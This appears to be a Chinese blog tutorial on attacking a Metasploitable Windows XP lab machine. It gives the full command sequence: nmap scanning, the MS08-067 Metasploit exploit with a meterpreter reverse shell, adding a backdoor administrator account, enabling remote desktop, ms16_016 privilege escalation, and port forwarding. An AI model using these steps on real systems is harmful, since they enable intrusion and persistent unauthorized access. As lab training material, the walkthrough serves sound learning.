Metasploitable的简单渗透测试

0x00 Metasploitable

Metasploitable漏洞演练系统,基于ubuntu、xp操作系统,本身设计作为安全工具测试和演示常见漏洞攻击,他的作用是用来作为MSF攻击用的靶机,他是一个具有无数未打补丁漏洞与开放了无数高危端口的渗透演练系统,可以使我们进行练习。
本次测试使用xp系统的靶机,下载地址

0x01 查看详细信息

nmap -sP -T5 
nmap -P1-65535 -T4 

使用nmap进行探测发现,使用nmap结合脚本进行扫描测试:

nmap -sT -A --script=smb-check-vulns -P0 192
-sT 使用TCP Connect扫描
-A 是指高级操作系统探测功能,对一个特定服务进行更深的旗标和指纹攫取
--script=smb-check-vulns 调用smb-check-vulns脚本
-P0 进行更深层次的扫描,不进行主机发现.168.0.146


发现探测出MS08-067漏洞,使用Metasploit进行攻击利用。

0x02 Metasploit的利用

2.1 查找 MS08-067相关的模块


2.2 使用选中的模块并查看


set TARGET 5

2.2 设置攻击参数
show options 查看一下参数,确保无误
设置PAYLOAD(攻击载荷)
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.146 设置远程主机IP地址
set LHOST 192.168.1.179 设置反向连接地址为本机IP地址
set LPORT 55555 设置本机监听的TCP端口号
这个载荷在攻击成功后,会从目标主机发起一个反弹连接,连接到LHOST中指定的IP地址。

2.3 开始攻击,发现已经上钩;

0x03 提权

3.1 查看权限,判断是否需要进行提权

getuid

3.2 增加用户名并设置为管理员

net user zjw 123 /add
net localgroup administrators zjw /add



3.3 开启3389端口远程登录

run getgui -e (仅仅是打开远程管理)
run getgui -u hacker -p s3cr3t(打开远程管理并且创造一个新的用户名为Hacker密码为s3cr3t的帐号)



3.4 远程连接目标主机
rdesktop -f -a 16 192.168.0.146:3389
成功登陆目标主机

0x04 补充知识

4.1 拿到shell只是普通用户怎么办?
上面演示的直接就是最高权限,当然这种情况在平时渗透测试中也是比较少见的,那么我们就得进行提权了。

meterpreter > background
msf exploit(handler) > search ms16
msf exploit(handler) > use exploit/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > info
msf exploit(ms16_016_webdav) > show options
msf exploit(ms16_016_webdav) > set SESSION 1    # 设置会刚才我们后门连接的ID号 1
msf exploit(ms16_016_webdav) > exploit
msf exploit(ms16_016_webdav) > sessions
msf exploit(ms16_016_webdav) > sessions -i 1
meterpreter > getuid

这是发现我们怎么还是普通权限,我们进行查看进程。然后加载我们的进程号

meterpreter > ps
meterpreter > migrate + 进程号

这样已经提升为了system权限

4.2 有时候我们在公网而目标主机在内网如何登陆?
这时候就要使用端口转发来实现了,将目标主机的端口转发到我们本机。

portfwd add -l 你本机的监听端口 -r 127.0.0.1 -p 3389

执行之后所有端口3389的内网流量都会通过这个meterpreter的会话来转发到你kali的127.0.0.1的指定端口上 。
假如在这里我设置的监听端口为2222,那么我执行的就是

portfwd add -l 2222 -r 127.0.0.1 -p 3389

然后开始连接远程桌面。新建一个终端窗口,执行连接Windows远程桌面的命令就OK了。

rdesktop 127.1.1.0:2222
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,117评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,328评论 1 293
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,839评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,007评论 0 206
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,384评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,629评论 1 219
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,880评论 2 313
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,593评论 0 198
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,313评论 1 243
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,575评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,066评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,392评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,052评论 3 236
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,082评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,844评论 0 195
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,662评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,575评论 2 270

推荐阅读更多精彩内容

  • win7 cmd管理员权限设置 net localgroup administrators 用户名 /add 把“...
    f675b1a02698阅读 4,983评论 0 11
  • 部分内容转载自搜狗百科 cmd是command的缩写.即命令提示符(CMD),是在OS / 2 , Windows...
    青冥之上阅读 2,351评论 0 24
  • 炎夏已至,除了在时尚秀中大热的高跟凉鞋,你还有一个不错的选择—高跟运动鞋。多年来,高跟运动鞋满足了很多姑娘的愿望,...
    qzuser_c168阅读 331评论 0 0
  • 任何项目的报价都隐含着报价者的经验。受小圆桌开发小组的委托,在此分享外包报价的一些考虑因素,希望能对接单经验不足的...
    小圆桌阅读 14,442评论 1 18
  • 想写一首诗 想写写最近的天气 晴朗了,又下雨了 一场又一场的 想写写心情 边喝水边看窗外天空飘过的云 平静地思考 ...
    wu枫阅读 129评论 0 1